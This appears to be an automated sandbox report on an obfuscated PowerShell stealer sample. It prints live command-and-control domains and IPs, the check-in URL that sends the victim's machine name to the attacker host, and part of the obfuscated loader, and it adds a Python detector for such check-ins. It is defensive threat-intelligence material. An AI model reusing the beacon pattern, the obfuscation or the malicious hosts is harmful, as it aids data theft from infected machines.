http://schema.org/WebPage | powershell.exe, 00000000.00000002.6044258706.000001A54FCD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A5410C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A541403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A5413EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A54109F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A5412AB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/webhp?tab=ww | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/finance?tab=we | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://maps.google.com/maps?hl=en&tab=wl | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.google.com | powershell.exe, 00000000.00000002.6017075770.000001A540801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540756000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/PesterXz | powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apis.google.com | powershell.exe, 00000000.00000002.6017075770.000001A540801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FBCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FCD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ocsp.quovadisoffshore.com0 | powershell.exe, 00000000.00000002.6050369486.000001A557933000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.6017075770.000001A53F901000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.blogger.com/?tab=wj | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.google.com/mobile/?hl=en&tab=wD | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/logos/doodles/2024/celebrating-the-kayak-6753651837110586-2x.png | powershell.exe, 00000000.00000002.6017075770.000001A5412AB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://$fz6258ikejydvr9/$1pjduqg5e6wlfi4.php?id=$env:computername&key=$zqphcmeybxj&s=mints13 | powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://play.google.com/?hl=en&tab=w8 | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/imghp?hl=en&tab=wi | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/shopping?hl=en&source=og&tab=wf | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lh3.googleusercontent.com/ogw/default-user=s96 | powershell.exe, 00000000.00000002.6044258706.000001A54FBCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FCD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crlft.com/prl/pMicT | powershell.exe, 00000000.00000002.6054715501.000001A5580F0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000000.00000002.6017075770.000001A541BAB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.google.com/?tab=wo | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mail.google.com/mail/?tab=wm | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.google.com/preferences?hl=en | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.youtube.com/?tab=w1 | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schema.org/WebPageXz | powershell.exe, 00000000.00000002.6017075770.000001A540783000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.htmlXz | powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lh3.googleusercontent.com/ogw/default-user=s24 | powershell.exe, 00000000.00000002.6044258706.000001A54FCD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.google.com/history/optout?hl=en | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://books.google.com/?hl=en&tab=wp | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lh3.googleusercontent.com/ogw/default-user=s24h | powershell.exe, 00000000.00000002.6017075770.000001A540801000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://translate.google.com/?hl=en&tab=wT | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.quovadis.bm0 | powershell.exe, 00000000.00000002.6050369486.000001A557933000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://calendar.google.com/calendar?tab=wc | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://gidcldeaccadneh.top | powershell.exe, 00000000.00000002.6017075770.000001A540119000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.6017075770.000001A53F901000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.pngXz | powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/logos/doodles/2024/celebrating-the-kayak-6753651837110586-2x.pngXz | powershell.exe, 00000000.00000002.6017075770.000001A540783000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs
Contacted public IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
206.188.196.37 | gidcldeaccadneh.top | United States | 55002 | DEFENSE-NETUS | true
64.233.185.105 | www.google.com | United States | 15169 | GOOGLEUS | false
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1556310
Start date and time: 2024-11-15 09:32:00 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected VM Detection
Number of analysed new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ryOpDCeOHz.ps1
Detection: MAL
Classification: mal72.evad.winPS1@2/7@2/2
EGA Information: Failed
HCA Information:
  • Successful, ratio: 93%
  • Number of executed functions: 12
  • Number of non-executed functions: 8
Cookbook Comments:
  • Found application associated with file extension: .ps1
  • Stop behavior analysis, all processes terminated
  • Exclude process from analysis (whitelisted): WmiPrvSE.exe
  • Excluded domains from analysis (whitelisted): settings-win.data.microsoft.com, ctldl.windowsupdate.com
  • Execution Graph export aborted for target powershell.exe, PID 7652 because it is empty
  • Not all processes were analyzed, report is missing behavior information
  • Report size getting too big, too many NtCreateKey calls found.
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: ryOpDCeOHz.ps1
Time | Type | Description
03:34:03 | API Interceptor | 31x Sleep call for process: powershell.exe modified

Context for IP 206.188.196.37 (the same C2 host seen in other analyses; the query string is the check-in URL each related sample contacted):
Associated Sample Name / URL | Detection | Threat Name | Context
Fdoze89ykv.js | malicious | Mint Stealer | gidcldeaccadneh.top/d3q2k547nrhtr.php?id=computer&key=49178848774&s=mints21
Fdoze89ykv.js | malicious | Mint Stealer | gidcldeaccadneh.top/xuceh2n0lohtr.php?id=user-PC&key=57894837609&s=mints21
Fattura05736577.vbs | malicious | Unknown | gidcldeaccadneh.top/06c2d9sea1htr.php?id=computer&key=21152678751&s=mints13
tibhzuygfuyz.ps1 | malicious | Unknown | gidcldeaccadneh.top/276lca0oqkhtr.php?id=computer&key=55933565450&s=mints13
tibhzuygfuyz.ps1 | malicious | Unknown | gidcldeaccadneh.top/9mtlfardohhtr.php?id=user-PC&key=89774062466&s=mints13
Fattura05736577.vbs | malicious | Unknown | gidcldeaccadneh.top/5nyvigqht1htr.php?id=user-PC&key=79290330744&s=mints13
Fattura41579790.vbs | malicious | Unknown | gidcldeaccadneh.top/fpmerz30vyhtr.php?id=computer&key=44154737485&s=mints13
Fattura41579790.vbs | malicious | Unknown | gidcldeaccadneh.top/se6y3fnhkvhtr.php?id=user-PC&key=69185160161&s=mints13
Fattura88674084.vbs | malicious | Unknown | jcgijjkddehkfli.top/2le1khmz8ghtr.php?id=computer&key=10263897153&s=mints13
Context for domain gidcldeaccadneh.top:
Associated Sample Name / URL | Detection | Threat Name | Context
Fdoze89ykv.js | malicious | Mint Stealer | 206.188.196.37
Fdoze89ykv.js | malicious | Mint Stealer | 206.188.196.37
Fattura05736577.vbs | malicious | Unknown | 206.188.196.37
tibhzuygfuyz.ps1 | malicious | Unknown | 206.188.196.37
tibhzuygfuyz.ps1 | malicious | Unknown | 206.188.196.37
Fattura05736577.vbs | malicious | Unknown | 206.188.196.37
Fattura41579790.vbs | malicious | Unknown | 206.188.196.37
Fattura41579790.vbs | malicious | Unknown | 206.188.196.37
Context for ASN DEFENSE-NETUS:
Associated Sample Name / URL | Detection | Threat Name | Context
Fdoze89ykv.js | malicious | Mint Stealer | 206.188.196.37
Fdoze89ykv.js | malicious | Mint Stealer | 206.188.196.37
Fattura05736577.vbs | malicious | Unknown | 206.188.196.37
tibhzuygfuyz.ps1 | malicious | Unknown | 206.188.196.37
tibhzuygfuyz.ps1 | malicious | Unknown | 206.188.196.37
Fattura05736577.vbs | malicious | Unknown | 206.188.196.37
Fattura41579790.vbs | malicious | Unknown | 206.188.196.37
Fattura41579790.vbs | malicious | Unknown | 206.188.196.37
https://ascerta.aha.io/shared/edaa0f8ea0ea06d13e545667a40fae36 | malicious | Unknown | 107.162.179.174
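The related-sample contexts above all share one check-in shape: `<c2 host>/<random token>htr.php?id=<machine name>&key=<digits>&s=mints<NN>`, and the unexpanded template `http://$fz6258ikejydvr9/$1pjduqg5e6wlfi4.php?id=$env:computername&key=$zqphcmeybxj&s=mints13` recovered from PowerShell memory shows the same shape with the host, script name and key still held in script variables (so the Avira "safe" verdict on that string says nothing about the real C2). The following detector is an added example, not part of the Joe Sandbox report or the sample: it normalises a URL, checks the path and the three query parameters, and runs over a constructed proxy log. The token width range, the parameter order tolerance and the log format are assumptions; the two matching URLs in the sample log are copied from the context table.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Path shape seen in every related-sample URL on this report: a short lowercase
# alphanumeric token ending in "htr", then ".php". The width range is an
# assumption generalising the nine observed 13-character tokens.
CHECKIN_PATH = re.compile(r"^/[a-z0-9]{6,20}htr\.php$")
BUILD_TAG = re.compile(r"^mints\d+$")  # s=mints13 / s=mints21 in the report


@dataclass(frozen=True)
class CheckIn:
    host: str        # C2 domain, e.g. gidcldeaccadneh.top
    victim_id: str   # id= carries the machine name ($env:computername in the template)
    key: str         # key= is an all-digit per-infection value
    build: str       # s= is the campaign/build tag


def match_checkin(url: str) -> Optional[CheckIn]:
    """Return a CheckIn if `url` has the Mint Stealer check-in shape, else None."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    if not parts.hostname or not CHECKIN_PATH.match(parts.path):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    # Exactly the three parameters, each present once, in any order.
    if set(params) != {"id", "key", "s"} or any(len(v) != 1 for v in params.values()):
        return None
    key, build = params["key"][0], params["s"][0]
    if not key.isdigit() or not BUILD_TAG.match(build):
        return None
    return CheckIn(parts.hostname, params["id"][0], key, build)


# Constructed proxy log (not from the report): timestamp, client, method, URL, status.
# Lines 1 and 3 reuse two check-in URLs listed in the context table above.
SAMPLE_PROXY_LOG = """\
2024-11-15T08:34:02Z 10.0.0.17 GET http://gidcldeaccadneh.top/d3q2k547nrhtr.php?id=computer&key=49178848774&s=mints21 200
2024-11-15T08:34:03Z 10.0.0.17 GET http://www.google.com/ 200
2024-11-15T08:34:09Z 10.0.0.23 GET http://jcgijjkddehkfli.top/2le1khmz8ghtr.php?id=user-PC&key=10263897153&s=mints13 200
2024-11-15T08:35:11Z 10.0.0.42 GET http://example.test/index.php?id=1&key=2&s=3 200
"""


def scan_proxy_log(text: str) -> List[Tuple[str, CheckIn]]:
    """Return (client, CheckIn) for every log line whose URL matches the check-in shape."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        found = match_checkin(fields[3])
        if found:
            hits.append((fields[1], found))
    return hits


if __name__ == "__main__":
    for client, hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{client} -> {hit.host} id={hit.victim_id} key={hit.key} build={hit.build}")
```

Because `id=` is the victim's machine name, a hit also tells you which host to pull for triage; pivoting on the `s=` build tag and the 11-digit `key=` is more robust than pivoting on the domain, which the related samples show rotates (gidcldeaccadneh.top, jcgijjkddehkfli.top).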
                                                                                              No context
                                                                                              No context
Dropped file:
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Reputation: high, very likely benign file
Preview: @...e...........................................................
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):6222
                                                                                              Entropy (8bit):3.7338105921964457
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:DsdxZZrC5LZUUT8HukvhkvklCywy+DlfF5wxvYSogZoHFjlfF5wx6YSogZoHBA:QdZrCRGurkvhkvCCtllfFKnHOlfFKsHj
                                                                                              MD5:D94F766C5CE393E0E49EC2C315DA5879
                                                                                              SHA1:71C29F0765ECCFB6ED9C355BBC3F7634740B05E1
                                                                                              SHA-256:E0BEE123ADCEC117F283F9EF988B424926C803495D9632A5CEB3AABD23C1DA22
                                                                                              SHA-512:D046DA2A29B8B4330FABBE889B419E8725ECBB19205F0B0C5583EA566219D1A557B867DC7C4AD81DB2A96D31B8425757BE5AA773C3E5E0A3DB7E4720EFFB7B13
                                                                                              Malicious:false
                                                                                              Preview:...................................FL..................F.".. ...;.}.S.....^.97..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S......97..q.b.97......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.oY7D....B......................A!.A.p.p.D.a.t.a...B.V.1.....oY<D..Roaming.@......"S.oY<D....D.....................%...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.oY7D....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....oY6...Windows.@......"S.oY6.....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`oY1.....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`oY1.....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.oY......J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.oYAD....i...........
                                                                                              File type:ASCII text, with very long lines (10864), with CRLF line terminators
                                                                                              Entropy (8bit):5.95377677495807
                                                                                              TrID:
                                                                                                File name:ryOpDCeOHz.ps1
                                                                                                File size:20'894 bytes
                                                                                                MD5:b551ce903d61eebc28085b06a85c9af1
                                                                                                SHA1:d7a8cfb2bff805e931f737d5031117d001d109a8
                                                                                                SHA256:6074c8778c3efd5bf30622cce9dbd59a86a82047b131fa08d45b2ced417b3e4f
                                                                                                SHA512:fba4911ad9a8d8daf44166718ed4dbf42b53cebf4959150ec589f392d2909c568e42f79c240807d8d46ae66673bfc8e65b79bbbda5d17d1a662fef85d5e3131a
                                                                                                SSDEEP:384:DUi9JFgdEUr8lOLvGWzWJJSpCgZ1InbKKuRNkHKn9UDpVcl:DUi3idx+OLRL1GbKK+3+1e
                                                                                                TLSH:F9927DA2A78CF5E21AD9CB7E6716EC44BF51647EC85EABC1F19AD4813391600ED48CC1
                                                                                                File Content Preview:$bqvatrmylwnpsf=$executioncontext;$tionenrearisonesesenonintionalered = ([CHaR[]]@((6446-6393),(-7405+7457),(563673/(3876488/(1530-1138))),(-9901+9951),(288288/5148),(8619-(43972710/5134)),(390-334),(9336-(17436-(10185595/(7702-(16072-(19298-(15465-5786))
                                                                                                Icon Hash:3270d6baae77db44
                                                                                                 Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                                 2024-11-15T09:34:05.698762+0100 | 2859003 | ETPRO MALWARE TA582 Domain in DNS Lookup | 1 | 192.168.11.20 | 60889 | 1.1.1.1 | 53 | UDP
                                                                                                 2024-11-15T09:34:06.667360+0100 | 2856654 | ETPRO MALWARE TA582 CnC Checkin | 1 | 192.168.11.20 | 49739 | 206.188.196.37 | 80 | TCP
                                                                                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                 Nov 15, 2024 09:34:05.698761940 CET | 60889 | 53 | 192.168.11.20 | 1.1.1.1
                                                                                                 Nov 15, 2024 09:34:05.870853901 CET | 53 | 60889 | 1.1.1.1 | 192.168.11.20
                                                                                                 Nov 15, 2024 09:34:06.620022058 CET | 59003 | 53 | 192.168.11.20 | 1.1.1.1
                                                                                                 Nov 15, 2024 09:34:06.737962008 CET | 53 | 59003 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 15, 2024 09:34:05.698761940 CET | 192.168.11.20 | 1.1.1.1 | 0xae6a | Standard query (0) | gidcldeaccadneh.top | A (IP address) | IN (0x0001) | false
Nov 15, 2024 09:34:06.620022058 CET | 192.168.11.20 | 1.1.1.1 | 0x6a04 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 15, 2024 09:34:05.870853901 CET | 1.1.1.1 | 192.168.11.20 | 0xae6a | No error (0) | gidcldeaccadneh.top | | 206.188.196.37 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 09:34:06.737962008 CET | 1.1.1.1 | 192.168.11.20 | 0x6a04 | No error (0) | www.google.com | | 64.233.185.105 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 09:34:06.737962008 CET | 1.1.1.1 | 192.168.11.20 | 0x6a04 | No error (0) | www.google.com | | 64.233.185.99 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 09:34:06.737962008 CET | 1.1.1.1 | 192.168.11.20 | 0x6a04 | No error (0) | www.google.com | | 64.233.185.103 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 09:34:06.737962008 CET | 1.1.1.1 | 192.168.11.20 | 0x6a04 | No error (0) | www.google.com | | 64.233.185.147 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 09:34:06.737962008 CET | 1.1.1.1 | 192.168.11.20 | 0x6a04 | No error (0) | www.google.com | | 64.233.185.104 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 09:34:06.737962008 CET | 1.1.1.1 | 192.168.11.20 | 0x6a04 | No error (0) | www.google.com | | 64.233.185.106 | A (IP address) | IN (0x0001) | false
                                                                                                • gidcldeaccadneh.top
                                                                                                • www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49739 | 206.188.196.37 | 80 | 7652 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Nov 15, 2024 09:34:06.091667891 CET | 219 | OUT | GET /hqr7nx0sg1htr.php?id=computer&key=50024904669&s=mints13 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
Host: gidcldeaccadneh.top
Connection: Keep-Alive
Nov 15, 2024 09:34:06.617750883 CET | 166 | IN | HTTP/1.1 302 Found
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Fri, 15 Nov 2024 08:34:06 GMT
                                                                                                Content-Length: 0
                                                                                                Connection: keep-alive
                                                                                                Location: http://www.google.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49740 | 64.233.185.105 | 80 | 7652 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Nov 15, 2024 09:34:06.858390093 CET | 159 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
Host: www.google.com
Connection: Keep-Alive
Nov 15, 2024 09:34:07.037514925 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 15 Nov 2024 08:34:06 GMT
                                                                                                Expires: -1
                                                                                                Cache-Control: private, max-age=0
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-0R-C7sZCkPi1LmJwjS5WOQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                Server: gws
                                                                                                X-XSS-Protection: 0
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Set-Cookie: AEC=AZ6Zc-UbGArOsl08lQHdfddMSsPgPrRcNOi0e8ymjDubfqLv0xidzxt8ig; expires=Wed, 14-May-2025 08:34:06 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                Set-Cookie: NID=519=Mm0GYdu21q-GsF6uJm_Cj1gcAuQKg8gEnU11z7ruKYHP1OSizNbpKBO543xXG13heolsxRdbk36q9zZpa-KUc1QdtM6hTbF6KKCO2SKw8fAExto_HhZaKyEuWfEe_HDLo_m-04T6eN5q-OSv2qq9o-90uwdHKYiYqp1kaBjlH6T0f5BycX6DtZxWXO-fBPWKWQvfYN7x; expires=Sat, 17-May-2025 08:34:06 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                Accept-Ranges: none
                                                                                                Vary: Accept-Encoding
                                                                                                Transfer-Encoding: chunked
                                                                                                Data Raw: 34 35 65 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68
                                                                                                Data Ascii: 45eb<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to h
